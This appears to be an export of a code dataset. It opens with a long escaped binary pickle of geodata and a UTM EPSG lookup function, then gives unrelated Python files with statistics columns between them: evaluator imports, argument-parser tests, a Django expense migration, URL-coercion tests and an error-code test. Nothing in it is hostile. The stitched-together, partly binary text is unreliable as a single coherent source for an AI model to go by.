\x88=\xfe\xf40@r\x1a\x02\x00\x00bh\xf8)Rr\x1b\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xccU=\xaa+\xf0[@\xe3\tsq\n\x130@\xaf\xb1KT\xef\xf4[@\xe3\tsq\n\x130@\xaf\xb1KT\xef\xf4[@\xeaa\xc3.\xe5\x070@\xccU=\xaa+\xf0[@\xeaa\xc3.\xe5\x070@\xccU=\xaa+\xf0[@\xe3\tsq\n\x130@r\x1c\x02\x00\x00bh\xf8)Rr\x1d\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xa4}\xbd\x0c\x10\x16\\@\xc9!\xe2\xe6T\xee0@\xdb\xe2uX<\x16\\@\xc9!\xe2\xe6T\xee0@\xdb\xe2uX<\x16\\@,r\x99\xe4\x91\xed0@\xa4}\xbd\x0c\x10\x16\\@,r\x99\xe4\x91\xed0@\xa4}\xbd\x0c\x10\x16\\@\xc9!\xe2\xe6T\xee0@r\x1e\x02\x00\x00bh\xf8)Rr\x1f\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00o\xf0\x85\xc9T\r\\@4\xa2\xb47\xf8\xfa0@\xe0\xf3\xc3\x08\xe1\r\\@4\xa2\xb47\xf8\xfa0@\xe0\xf3\xc3\x08\xe1\r\\@54T{\xc7\xf90@o\xf0\x85\xc9T\r\\@54T{\xc7\xf90@o\xf0\x85\xc9T\r\\@4\xa2\xb47\xf8\xfa0@r \x02\x00\x00bh\xf8)Rr!\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xfc\x17\xadH\xf1\x15\\@\x93y?\xc9x\xef0@\x84\x91\xa8a\t\x16\\@\x93y?\xc9x\xef0@\x84\x91\xa8a\t\x16\\@\xfbo\xca\x81\xc3\xee0@\xfc\x17\xadH\xf1\x15\\@\xfbo\xca\x81\xc3\xee0@\xfc\x17\xadH\xf1\x15\\@\x93y?\xc9x\xef0@r"\x02\x00\x00bh\xf8)Rr#\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00o\xda\xe7\x8c\x83\xe4[@\xebA\xf7\x9b?F0@\x08\xd2 `\x08\xf4[@\xebA\xf7\x9b?F0@\x08\xd2 `\x08\xf4[@{\x8f\xe9\xbf\xbd)0@o\xda\xe7\x8c\x83\xe4[@{\x8f\xe9\xbf\xbd)0@o\xda\xe7\x8c\x83\xe4[@\xebA\xf7\x9b?F0@r$\x02\x00\x00bh\xf8)Rr%\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe2\x83\x8d\xa1\xd2\x15\\@\x06`\xa8hQ\xf00@\xc7F\xc5\xa4\xe4\x15\\@\x06`\xa8hQ\xf00@\xc7F\xc5\xa4\xe4\x15\\@\xff\xaa\xc8\x8d\xc7\xef0@\xe2\x83\x8d\xa1\xd2\x15\\@\xff\xaa\xc8\x8d\xc7\xef0@\xe2\x83\x8d\xa1\xd2\x15\\@\x06`\xa8hQ\xf00@r&\x02\x00\x00bh\xf8)Rr\'\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xed\x9e<,T\x16\\@\xd0\x1f\xe4\x06\x8d\xca\x0f@\xb1\x10\xc2HT\x16\\@\xd0\x1f\xe4\x06\x8d\xca\x0f@\xb1\x10\xc2HT\x16\\@C\xe75v\x89\xca\x0f@\xed\x9e<,T\x16\\@C\xe75v\x89\xca\x0f@\xed\x9e<,T\x16\\@\xd0\x1f\xe4\x06\x8d\xca\x0f@r(\x02\x00\x00bh\xf8)Rr)\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x003\\\xd3r\xd6\xec[@\x0f\xfc^\xf9\xe2\x950@D\xa8\xadl\xfa\xec[@\x0f\xfc^\xf9\xe2\x950@D\xa8\xadl\xfa\xec[@j]\xb4\x11\x99\x950@3\\\xd3r\xd6\xec[@j]\xb4\x11\x99\x950@3\\\xd3r\xd6\xec[@\x0f\xfc^\xf9\xe2\x950@r*\x02\x00\x00bh\xf8)Rr+\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00<\x83+E\x17\x12\\@\xc1R]\xc0\xcb\xbc\x0f@u{\xa4\x1c\'\x12\\@\xc1R]\xc0\xcb\xbc\x0f@u{\xa4\x1c\'\x12\\@\x15\xca\xc2\xd7\xd7\xba\x0f@<\x83+E\x17\x12\\@\x15\xca\xc2\xd7\xd7\xba\x0f@<\x83+E\x17\x12\\@\xc1R]\xc0\xcb\xbc\x0f@r,\x02\x00\x00bh\xf8)Rr-\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x90`O\xe0\xc2\xe9[@\x85{e\xde\xaa\x930@\xfe\xf7;o>\xeb[@\x85{e\xde\xaa\x930@\xfe\xf7;o>\xeb[@\xf6\x14\xef\xb6\xc1\x8f0@\x90`O\xe0\xc2\xe9[@\xf6\x14\xef\xb6\xc1\x8f0@\x90`O\xe0\xc2\xe9[@\x85{e\xde\xaa\x930@r.\x02\x00\x00bh\xf8)Rr/\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe0\xfbvmJ\xef[@\xc6\xdb\xef\xf5Zw0@\xd6\xee\rt\xa3\xef[@\xc6\xdb\xef\xf5Zw0@\xd6\xee\rt\xa3\xef[@G8-x\xd1u0@\xe0\xfbvmJ\xef[@G8-x\xd1u0@\xe0\xfbvmJ\xef[@\xc6\xdb\xef\xf5Zw0@r0\x02\x00\x00bh\xf8)Rr1\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xab\xaeC5%\xcc[@\x07\x841}\n\x9b/@\xd5\x1d0\xb4_\xce[@\x07\x841}\n\x9b/@\xd5\x1d0\xb4_\xce[@\x0c\xbcI\xc2t\x8c/@\xab\xaeC5%\xcc[@\x0c\xbcI\xc2t\x8c/@\xab\xaeC5%\xcc[@\x07\x841}\n\x9b/@r2\x02\x00\x00bh\xf8)Rr3\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xbe3\xda\xaa$\x15\\@\xcb\xe1\xee\x07\x97\xf30@\xc3}\x89\x1d2\x15\\@\xcb\xe1\xee\x07\x97\xf30@\xc3}\x89\x1d2\x15\\@s\x1f\xcaaA\xf30@\xbe3\xda\xaa$\x15\\@s\x1f\xcaaA\xf30@\xbe3\xda\xaa$\x15\\@\xcb\xe1\xee\x07\x97\xf30@r4\x02\x00\x00bh\xf8)Rr5\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe0+_<(\xe0[@I$\x1bYCs0@UTX\x04\xda\xe0[@I$\x1bYCs0@UTX\x04\xda\xe0[@\x83R\xb4r/r0@\xe0+_<(\xe0[@\x83R\xb4r/r0@\xe0+_<(\xe0[@I$\x1bYCs0@r6\x02\x00\x00bh\xf8)Rr7\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xd8\x95;\xd8\x87x\\@\xd4*\xfaC333@~\x19\x8c\x11\x89x\\@\xd4*\xfaC333@~\x19\x8c\x11\x89x\\@\xbe\xfa\xd3\xa1.33@\xd8\x95;\xd8\x87x\\@\xbe\xfa\xd3\xa1.33@\xd8\x95;\xd8\x87x\\@\xd4*\xfaC333@r8\x02\x00\x00bh\xf8)Rr9\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00l\xf97\x1e"\x16\\@\xb9\xcb\xd9\x96\\\xec0@\xe0\\\r\x9a\'\x16\\@\xb9\xcb\xd9\x96\\\xec0@\xe0\\\r\x9a\'\x16\\@\xfdP\xc4}?\xec0@l\xf97\x1e"\x16\\@\xfdP\xc4}?\xec0@l\xf97\x1e"\x16\\@\xb9\xcb\xd9\x96\\\xec0@r:\x02\x00\x00bh\xf8)Rr;\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00Q}\x8c^28\\@\x10\x8a\xf7-\x84\xd20@a\xa5\x82\x8a\xaa9\\@\x10\x8a\xf7-\x84\xd20@a\xa5\x82\x8a\xaa9\\@\xf2\x04g\x95>\xcd0@Q}\x8c^28\\@\xf2\x04g\x95>\xcd0@Q}\x8c^28\\@\x10\x8a\xf7-\x84\xd20@r<\x02\x00\x00bh\xf8)Rr=\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x004\xf2y\xc5S\xe1\\@\x9aCR\x0b%\xc3#@\xb9\x89Z\x9a[\xe1\\@\x9aCR\x0b%\xc3#@\xb9\x89Z\x9a[\xe1\\@1\xb5\xa5\x0e\xf2\xc2#@4\xf2y\xc5S\xe1\\@1\xb5\xa5\x0e\xf2\xc2#@4\xf2y\xc5S\xe1\\@\x9aCR\x0b%\xc3#@r>\x02\x00\x00bh\xf8)Rr?\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xff\x05\x82\x00\x99\xd9\\@\x1e\x9a\xc3\xffg\xe6+@\xa5\x89\xd29\x9a\xd9\\@\x1e\x9a\xc3\xffg\xe6+@\xa5\x89\xd29\x9a\xd9\\@\x17X\x11\x7f^\xe6+@\xff\x05\x82\x00\x99\xd9\\@\x17X\x11\x7f^\xe6+@\xff\x05\x82\x00\x99\xd9\\@\x1e\x9a\xc3\xffg\xe6+@r@\x02\x00\x00bh\xf8)RrA\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xb3\xc2>K!B\\@\xba-\x91\x0b\xce\x8c3@\xb9\xef\x07\xf2"B\\@\xba-\x91\x0b\xce\x8c3@\xb9\xef\x07\xf2"B\\@\x17I\xbb\xd1\xc7\x8c3@\xb3\xc2>K!B\\@\x17I\xbb\xd1\xc7\x8c3@\xb3\xc2>K!B\\@\xba-\x91\x0b\xce\x8c3@rB\x02\x00\x00bh\xf8)RrC\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xaf\xf2_{\xc1\r\\@\x0cW\x07@\xdcy/@\x9e\x07wgm\x10\\@\x0cW\x07@\xdcy/@\x9e\x07wgm\x10\\@\xbcy\xaaCnj/@\xaf\xf2_{\xc1\r\\@\xbcy\xaaCnj/@\xaf\xf2_{\xc1\r\\@\x0cW\x07@\xdcy/@rD\x02\x00\x00bh\xf8)RrE\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xd5bK\xea\xdf\xef[@h\t\x8d\xbb\x9c\x8b0@\x89\x925\x8f\xe8\xef[@h\t\x8d\xbb\x9c\x8b0@\x89\x925\x8f\xe8\xef[@2e\x96\xf3{\x8b0@\xd5bK\xea\xdf\xef[@2e\x96\xf3{\x8b0@\xd5bK\xea\xdf\xef[@h\t\x8d\xbb\x9c\x8b0@rF\x02\x00\x00bh\xf8)RrG\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00z\x17\x94\x0e\xfb\x15\\@\xd6$.\xb6\xff\xeb0@p\xfa\xc4K\x01\x16\\@\xd6$.\xb6\xff\xeb0@p\xfa\xc4K\x01\x16\\@3NCT\xe1\xeb0@z\x17\x94\x0e\xfb\x15\\@3NCT\xe1\xeb0@z\x17\x94\x0e\xfb\x15\\@\xd6$.\xb6\xff\xeb0@rH\x02\x00\x00bh\xf8)RrI\x02\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xeb\xfa\xaa\x01\xef.]@@\xfcW\xb1SU0@\xf1\x16\xa3\t\xef.]@@\xfcW\xb1SU0@\xf1\x16\xa3\t\xef.]@\xff\x0c\xca\x8fSU0@\xeb\xfa\xaa\x01\xef.]@\xff\x0c\xca\x8fSU0@\xeb\xfa\xaa\x01\xef.]@@\xfcW\xb1SU0@rJ\x02\x00\x00betrK\x02\x00\x00bsbe]rL\x02\x00\x00(h\x07h\x08}rM\x02\x00\x00(h\nh\x0bh\x0cK\x00\x85rN\x02\x00\x00h\x0e\x87rO\x02\x00\x00RrP\x02\x00\x00(K\x01K\x02\x85rQ\x02\x00\x00h\x15\x89]rR\x02\x00\x00(h\x19h\x1aetrS\x02\x00\x00bh\x1dNu\x86rT\x02\x00\x00RrU\x02\x00\x00h\x07h\x08}rV\x02\x00\x00(h\nh\x0bh\x0cK\x00\x85rW\x02\x00\x00h\x0e\x87rX\x02\x00\x00RrY\x02\x00\x00(K\x01K\x01\x85rZ\x02\x00\x00h\x15\x89]r[\x02\x00\x00h\x1batr\\\x02\x00\x00bh\x1dNu\x86r]\x02\x00\x00Rr^\x02\x00\x00e}r_\x02\x00\x00X\x06\x00\x00\x000.14.1r`\x02\x00\x00}ra\x02\x00\x00(X\x04\x00\x00\x00axesrb\x02\x00\x00h\x06X\x06\x00\x00\x00blocksrc\x02\x00\x00]rd\x02\x00\x00(}re\x02\x00\x00(X\x06\x00\x00\x00valuesrf\x02\x00\x00h*X\x08\x00\x00\x00mgr_locsrg\x02\x00\x00cbuiltins\nslice\nrh\x02\x00\x00K\x00K\x02K\x01\x87ri\x02\x00\x00Rrj\x02\x00\x00u}rk\x02\x00\x00(jf\x02\x00\x00h\xf1jg\x02\x00\x00jh\x02\x00\x00K\x02K\x03K\x01\x87rl\x02\x00\x00Rrm\x02\x00\x00ueustrn\x02\x00\x00bX\x04\x00\x00\x00_typro\x02\x00\x00X\t\x00\x00\x00dataframerp\x02\x00\x00X\t\x00\x00\x00_metadatarq\x02\x00\x00]rr\x02\x00\x00(X\x03\x00\x00\x00crsrs\x02\x00\x00X\x15\x00\x00\x00_geometry_column_namert\x02\x00\x00ejs\x02\x00\x00}ru\x02\x00\x00X\x04\x00\x00\x00initrv\x02\x00\x00X\t\x00\x00\x00epsg:4326rw\x02\x00\x00sjt\x02\x00\x00h\x1bub.')
spatial_index = gdf.sindex
possible_matches_index = list(spatial_index.intersection(coordinates))
if len(possible_matches_index) > 0:
possible_matches = gdf.iloc[possible_matches_index]
return int(possible_matches.loc[possible_matches['geometry'].apply(lambda x: x.area).idxmin()]['epsg'])
else:
return get_utm_epsg(coordinates)
def get_utm_epsg(coordinates):
"""Gets the EPSG code for the UTM Zone that intersects a geometry's centroid."""
lon, lat = coordinates
zone_number = str(latlon_to_zone_number(lat, lon))
zone_hemisphere = '6' if latitude_to_zone_letter(lat) >= 'N' else 7
return int('32{0}{1}'.format(zone_hemisphere, zone_number))
| 2,099.103448
| 59,885
| 0.733482
| 13,558
| 60,874
| 3.287579
| 0.092713
| 0.313777
| 0.256433
| 0.146726
| 0.825455
| 0.785386
| 0.769973
| 0.742916
| 0.698181
| 0.632311
| 0
| 0.32126
| 0.004468
| 60,874
| 28
| 59,886
| 2,174.071429
| 0.414244
| 0.003253
| 0
| 0
| 0
| 0.588235
| 0.390337
| 0.389677
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
eaf8ade65e738d34ed6cd271255301df4b151ec7
| 392
|
py
|
Python
|
openrec/tf1/utils/evaluators/__init__.py
|
pbaiz/openrec
|
a00de2345844858194ef43ab6845342114a5be93
|
[
"Apache-2.0"
] | 399
|
2018-01-04T15:24:02.000Z
|
2022-03-31T09:39:05.000Z
|
openrec/tf1/utils/evaluators/__init__.py
|
pbaiz/openrec
|
a00de2345844858194ef43ab6845342114a5be93
|
[
"Apache-2.0"
] | 26
|
2018-01-14T04:01:28.000Z
|
2022-02-09T23:36:32.000Z
|
openrec/tf1/utils/evaluators/__init__.py
|
pbaiz/openrec
|
a00de2345844858194ef43ab6845342114a5be93
|
[
"Apache-2.0"
] | 97
|
2017-12-22T07:07:35.000Z
|
2022-01-24T19:04:02.000Z
|
from openrec.tf1.utils.evaluators.evaluator import Evaluator
from openrec.tf1.utils.evaluators.auc import AUC
from openrec.tf1.utils.evaluators.recall import Recall
from openrec.tf1.utils.evaluators.eval_manager import EvalManager
from openrec.tf1.utils.evaluators.mse import MSE
from openrec.tf1.utils.evaluators.ndcg import NDCG
from openrec.tf1.utils.evaluators.precision import Precision
| 49
| 65
| 0.857143
| 57
| 392
| 5.877193
| 0.263158
| 0.229851
| 0.292537
| 0.397015
| 0.60597
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0.071429
| 392
| 7
| 66
| 56
| 0.901099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dc1de47118500b7850d4301154ca98948438f404
| 1,643
|
py
|
Python
|
tests/test_arg_parser.py
|
bcbogdan/lisa-parser
|
08b636ef1d5ebafc076da11c84e92765cbc381bf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_arg_parser.py
|
bcbogdan/lisa-parser
|
08b636ef1d5ebafc076da11c84e92765cbc381bf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_arg_parser.py
|
bcbogdan/lisa-parser
|
08b636ef1d5ebafc076da11c84e92765cbc381bf
|
[
"Apache-2.0"
] | null | null | null |
from config import init_arg_parser
from nose.tools import assert_equals
def test_default_usage():
parsed_arguments = init_arg_parser().parse_args(
['xmlfilepath', 'logfilepath']
)
assert_equals(parsed_arguments.xml_file_path, 'xmlfilepath')
assert_equals(parsed_arguments.log_file_path, 'logfilepath')
assert_equals(parsed_arguments.skipkvp, False)
assert_equals(parsed_arguments.loglevel, 2)
assert_equals(parsed_arguments.perf, False)
assert_equals(parsed_arguments.config, 'config/db.config')
def test_full_arguments_list():
parsed_arguments = init_arg_parser().parse_args(
['xmlfilepath', 'logfilepath', '-k', '-c', 'config', '-l', '3',
'-p', 'perflogpath']
)
assert_equals(parsed_arguments.xml_file_path, 'xmlfilepath')
assert_equals(parsed_arguments.log_file_path, 'logfilepath')
assert_equals(parsed_arguments.skipkvp, True)
assert_equals(parsed_arguments.loglevel, 3)
assert_equals(parsed_arguments.config, 'config')
assert_equals(parsed_arguments.perf, 'perflogpath')
def test_full_name_arguments_list():
parsed_arguments = init_arg_parser().parse_args(
['xmlfilepath', 'logfilepath', '--skipkvp',
'--config', 'config', '--loglevel', '3',
'--perf', 'perflogpath']
)
assert_equals(parsed_arguments.xml_file_path, 'xmlfilepath')
assert_equals(parsed_arguments.log_file_path, 'logfilepath')
assert_equals(parsed_arguments.skipkvp, True)
assert_equals(parsed_arguments.loglevel, 3)
assert_equals(parsed_arguments.config, 'config')
assert_equals(parsed_arguments.perf, 'perflogpath')
| 37.340909
| 71
| 0.734632
| 190
| 1,643
| 5.973684
| 0.210526
| 0.277533
| 0.285463
| 0.428194
| 0.861674
| 0.794714
| 0.760352
| 0.760352
| 0.760352
| 0.70837
| 0
| 0.003556
| 0.144248
| 1,643
| 43
| 72
| 38.209302
| 0.803698
| 0
| 0
| 0.485714
| 0
| 0
| 0.157638
| 0
| 0
| 0
| 0
| 0
| 0.542857
| 1
| 0.085714
| false
| 0
| 0.057143
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
dc385abc372e1fa11f0e9114d3ba56e2eb3b84db
| 5,114
|
py
|
Python
|
xpense/flockapp/migrations/0001_initial.py
|
akhilraj95/xpense
|
d107662eca77cbee302ce7c8fea8a1bee0d4bb8b
|
[
"MIT"
] | null | null | null |
xpense/flockapp/migrations/0001_initial.py
|
akhilraj95/xpense
|
d107662eca77cbee302ce7c8fea8a1bee0d4bb8b
|
[
"MIT"
] | null | null | null |
xpense/flockapp/migrations/0001_initial.py
|
akhilraj95/xpense
|
d107662eca77cbee302ce7c8fea8a1bee0d4bb8b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-18 09:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Chat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default='user', max_length=30)),
('chatId', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='ChatExpense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True)),
('amount', models.FloatField(default=0.0)),
('purpose', models.CharField(default='Unspecified', max_length=100)),
('equallyshared', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Chattrack',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('start_date', models.DateTimeField(auto_now_add=True)),
('end_date', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
('user', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Chat')),
],
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('abbr', models.CharField(max_length=5)),
],
),
migrations.CreateModel(
name='Expense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True)),
('amount', models.FloatField(default=0.0)),
('purpose', models.CharField(default='Unspecified', max_length=100)),
('equallyshared', models.BooleanField(default=False)),
('currency', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Currency')),
],
),
migrations.CreateModel(
name='Track',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('start_date', models.DateTimeField(auto_now_add=True)),
('end_date', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default='user', max_length=30)),
('userId', models.CharField(max_length=100)),
('token', models.CharField(max_length=100)),
],
),
migrations.AddField(
model_name='track',
name='user',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.User'),
),
migrations.AddField(
model_name='expense',
name='paidby',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.User'),
),
migrations.AddField(
model_name='expense',
name='track',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Track'),
),
migrations.AddField(
model_name='chatexpense',
name='currency',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Currency'),
),
migrations.AddField(
model_name='chatexpense',
name='paidby',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.User'),
),
migrations.AddField(
model_name='chatexpense',
name='track',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='flockapp.Chattrack'),
),
]
| 44.469565
| 143
| 0.578412
| 506
| 5,114
| 5.713439
| 0.171937
| 0.057074
| 0.055344
| 0.068488
| 0.819094
| 0.809754
| 0.75614
| 0.75614
| 0.75614
| 0.75614
| 0
| 0.012761
| 0.27982
| 5,114
| 114
| 144
| 44.859649
| 0.772197
| 0.013297
| 0
| 0.726415
| 1
| 0
| 0.09538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028302
| 0
| 0.066038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc5a2294ad08f574a5be35fda99d8613ce9b8e8e
| 1,625
|
py
|
Python
|
tests/crawler/lib_test.py
|
DBeath/feedsearch-crawler
|
91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9
|
[
"MIT"
] | 20
|
2019-11-02T18:46:11.000Z
|
2022-03-18T16:22:32.000Z
|
tests/crawler/lib_test.py
|
DBeath/feedsearch-crawler
|
91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9
|
[
"MIT"
] | 8
|
2019-11-02T08:26:17.000Z
|
2021-05-07T15:11:17.000Z
|
tests/crawler/lib_test.py
|
DBeath/feedsearch-crawler
|
91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9
|
[
"MIT"
] | 5
|
2020-06-18T15:44:48.000Z
|
2022-02-19T14:21:47.000Z
|
from feedsearch_crawler.crawler.lib import coerce_url, is_same_domain
from yarl import URL
def test_coerce_url():
assert coerce_url("test.com") == URL("http://test.com")
assert coerce_url("https://test.com") == URL("https://test.com")
assert coerce_url(" https://test.com") == URL("https://test.com")
assert coerce_url("test.com/path/path2") == URL("http://test.com/path/path2")
assert coerce_url("test.com", https=True) == URL("https://test.com")
assert coerce_url("https://test.com", https=True) == URL("https://test.com")
assert coerce_url(" https://test.com", https=True) == URL("https://test.com")
assert coerce_url("http://test.com", https=True) == URL("https://test.com")
assert coerce_url("test.com/path/path2", https=True) == URL(
"https://test.com/path/path2"
)
assert coerce_url("//test.com") == URL("http://test.com")
assert coerce_url("feed://test.com") == URL("feed://test.com")
assert coerce_url("feed://www.internet-law.de/?feed=/feed/") == URL(
"feed://www.internet-law.de/?feed=/feed/"
)
def test_is_same_domain():
assert is_same_domain("test.com", "test.com") is True
assert is_same_domain("example.com", "test.com") is False
assert is_same_domain("feeds.test.com", "test.com") is False
assert is_same_domain("test.com", "feeds.test.com") is True
assert is_same_domain("test.com", "test.feeds.test.com") is True
assert is_same_domain("www.test.com", "test.com") is True
assert is_same_domain("www.test.com", "feed.test.com") is True
assert is_same_domain("test.www.test.com", "test.com") is False
| 47.794118
| 81
| 0.664
| 254
| 1,625
| 4.102362
| 0.110236
| 0.24856
| 0.172745
| 0.158349
| 0.855086
| 0.855086
| 0.783109
| 0.759117
| 0.699616
| 0.510557
| 0
| 0.002849
| 0.136
| 1,625
| 33
| 82
| 49.242424
| 0.739316
| 0
| 0
| 0.142857
| 0
| 0
| 0.374154
| 0.048
| 0
| 0
| 0
| 0
| 0.714286
| 1
| 0.071429
| true
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dcb2d1ffd53bc700a4d23c8a446b83de5fdc1e20
| 168
|
py
|
Python
|
tests/nex/test_errors.py
|
azillion/DodoTrafficControl
|
9aa014f6d1ac3ad4ea5747d7ded4749ea60f7422
|
[
"MIT"
] | 209
|
2017-05-15T19:38:34.000Z
|
2020-11-30T03:31:07.000Z
|
tests/nex/test_errors.py
|
azillion/DodoTrafficControl
|
9aa014f6d1ac3ad4ea5747d7ded4749ea60f7422
|
[
"MIT"
] | 44
|
2018-07-06T16:08:54.000Z
|
2020-11-29T20:04:32.000Z
|
tests/nex/test_errors.py
|
azillion/DodoTrafficControl
|
9aa014f6d1ac3ad4ea5747d7ded4749ea60f7422
|
[
"MIT"
] | 34
|
2017-05-23T17:35:57.000Z
|
2020-11-29T17:37:16.000Z
|
from nintendo.nex import errors
def test_basic():
assert errors.error_names[0x10001] == "Core::Unknown"
assert errors.error_codes["Core::Unknown"] == 0x10001
| 24
| 55
| 0.72619
| 22
| 168
| 5.409091
| 0.681818
| 0.201681
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.142857
| 168
| 6
| 56
| 28
| 0.743056
| 0
| 0
| 0
| 0
| 0
| 0.161491
| 0
| 0
| 0
| 0.086957
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4e5385b45669fe912257fc0b46b9a6bc23be3bf
| 35,459
|
py
|
Python
|
